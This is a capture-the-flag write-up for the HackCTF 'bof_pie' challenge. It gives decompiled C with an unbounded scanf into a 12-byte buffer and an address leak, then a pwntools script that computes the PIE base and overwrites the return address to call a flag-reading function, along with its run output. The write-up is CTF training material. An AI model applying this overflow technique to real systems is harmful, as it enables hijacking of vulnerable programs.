bof_pie
Source
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
void j0n9hyun()
{
char s; // [esp+4h] [ebp-34h]
FILE *stream; // [esp+2Ch] [ebp-Ch]
puts("ha-wi");
stream = fopen("flag", "r");
if ( stream )
{
fgets(&s, 40, stream);
fclose(stream);
puts(&s);
}
else
{
perror("flag");
}
}
int welcome()
{
char v1[12]; // [esp+6h] [ebp-12h]
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
puts("Hello, Do you know j0n9hyun?");
printf("j0n9hyun is %p\n", welcome);
return _isoc99_scanf("%s", v1);
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
welcome();
puts("Nah...");
return 0;
}
Solve
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
#context.log_level = 'DEBUG'
context.arch = 'i386'
e = ELF("./bof_pie")
#p = process("./bof_pie")
r = remote("ctf.j0n9hyun.xyz", 3008)
welcome_offset = 0x909
j0n9hyun_offset = 0x890
print r.recvline()
print r.recvuntil("j0n9hyun is ")
j0n9hyun = int(r.recv(10), 16)
print hex(j0n9hyun)
base_addr = j0n9hyun - welcome_offset
print "base_addr : ",hex(base_addr)
payload = ''
payload += "A"*22
payload += p32(base_addr + j0n9hyun_offset)
r.sendline(payload)
r.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜ hackctf python bof_pie.py
[*] '/home/ubuntu/ctf/hackctf/bof_pie'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to ctf.j0n9hyun.xyz on port 3008: Done
Hello, Do you know j0n9hyun?
j0n9hyun is
0x565a9909
base_addr : 0x565a9000
[*] Switching to interactive mode
ha-wi
HackCTF{Fla}
[*] Got EOF while reading in interactive